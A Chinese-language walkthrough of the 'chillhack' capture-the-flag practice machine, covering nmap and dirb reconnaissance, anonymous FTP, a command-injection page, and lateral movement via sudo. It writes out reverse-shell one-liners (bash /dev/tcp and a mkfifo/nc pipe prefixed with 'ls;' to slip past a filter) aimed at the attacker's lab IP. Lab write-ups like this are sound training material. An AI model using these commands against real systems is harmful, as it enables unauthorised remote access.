chillhack靶场实验

chillhack靶场实验

环境搭建

虚拟机导入kali和chillhack，修改⽹络适配器为仅主机模式

Kali的用户名为root，密码为123qwe

chillhack是一个未知的，真实模拟环境

信息收集

主机发现与主机识别

主机发现：探测网络中存活的主机

主机识别：识别主机的操作系统，利用操作系统本身的漏洞进行攻击

查看扫描者的IP：

192.168.238.130/24

扫描者和被扫描者绑定了同一块网卡，所以在同一网段：192.168.238.0/24

知道了黑盒的网段，但是不知道黑盒的具体IP地址

使用namp扫描工具：

nmap -sn 192.168.238.0/24

一共扫描出来3个IP其中，除去我自己的IP地址192.168.238.130，

还有两个IP地址：192.168.238.131和192.168.238.254

具体哪一个是黑盒的IP地址，可以通过ping请求来验证：

（尝试ping请求，通过对端是否有回应来判断主机是否存活）

所以，这个黑盒的主机IP地址为192.168.238.131

TTL值为64，代表操作系统可能是Linux（或Windows 7）

端口发现和服务识别

端口发现：寻找入侵入口

服务识别：识别主机开启的服务

使用namp扫描工具：

nmap -sC -sV 192.168.238.131 -p- --min-rate=2000 -n -vv

其中的参数，

-sC：默认的脚本扫描，只要是搜集各种应用服务的信息

-sV：端口服务及版本

-v：显示扫描进程

扫描出了3种服务：

TCP 21代表FTP服务

TCP 80代表HTTP服务  web站点  漏洞

TCP 22代表SSH服务

FTP服务具体：

vsftpd 3.0.3

ftp的服务版本（可以利用该版本存在的漏洞进行攻击）

ftp-anon: Anonymous FTP login allowed (FTP code 230)

允许匿名登陆

-rw-r--r--    1 1001    1001    90 Oct 03  2020  note.txt

note.txt文件我可读

查看note.txt文件：

只有提示信息

SSH服务具体：

提供了一个RSA的加密文件

暂时用不着

HTTP服务具体：

Apache 2.4.29

Methods: HEAD GET POST OPTIONS

Info界面

通过访问主页，发现静态页面，没有后台数据库

对网站进行进一步扫描   目录扫描工具   御剑  dirb  nikto

使用dirb目录扫描工具：

dirb -host 192.168.238.131

根据目录扫描，发现了一个可疑目录secret ，可以访问这个可疑目录

可以看到这个目录下的页面，有一个对话框，可以借用id指令去测试，发现可以执行id命令

说明有一个命令执行漏洞可以利用

漏洞利用

利用命令执行漏洞，反弹shell

目标发送，我去接收

使用nc工具：可以监听指定端口收到的数据，也可以利用指定端口和目标进行沟通

打开nc工具：

nc -lvp 9999

凡是访问9999端口的数据都会被监听到

下一步，反弹shell

1）bash

bash -i >& /dev/tcp/192.168.238.130/9999 0>&1

（把输入和输出都重定向到攻击主机的9999端口）

在对话框中执行这条命令

发现这条命令被过滤了

2）rm

ls;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.238.130 9999>/tmp/f

在对话框中执行这条命令

发现9999端口监听到了数据，说明我与目标主机之间的临时通道建立成功，相当于我在目标主机里面创建了一个据点

我就可以通过这个据点去对目标主机进行其他操作

如：

sudo -ll  可以查看当前用户下可以执行的指令，文件

发现一个.sh的可执行文件，在/home/apaar/目录下

尝试以apaar身份执行.helpline.sh脚本（当对某脚本有执行权限时，以其他身份执行该脚本是不需要密码就可以执行的）

sudo -u apaar ./.helpline.sh

userflag实现

​

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。